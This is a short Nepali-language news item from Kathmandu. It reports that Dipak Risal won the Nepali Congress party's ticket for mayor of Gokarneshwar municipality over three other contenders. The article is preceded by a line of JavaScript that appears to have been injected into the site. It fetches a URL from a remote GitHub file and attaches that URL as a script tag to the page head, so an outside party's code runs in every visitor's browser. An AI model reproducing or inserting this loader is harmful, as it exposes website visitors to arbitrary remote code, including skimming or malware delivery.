;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, काठमाडौँ |
नेपाली काँग्रेस पार्टीबाट काठमाडौँ क्षेत्र नं ३ गोकर्णेश्वर नगरपालिकाको मेयरमा दिपक रिसालले टिकेट पाएका छन् | नगर समितिबाट १ नं मा नाम गएका उनले अन्तत मेयरको टिकेट हात परेका हुन् |
गोकर्णेश्वर नगरपालिकाको मेयरमा ४ जनाको दावी रहेको थियो | जसमा दिपक रिसाल, सन्तोष चालिसे, बिमल ठकुरी र मनोज ढुंगाना गरि ४ जना दावेदार रहेका थिए |
मेयरको टिकेट ६ कसले पाउछ भन्ने कुरामा गोकर्नेश्वोर नगरपालिकामा धेरै चासोको बिषय रहेको थियो |
फेसबुक प्रतिक्रियाहरु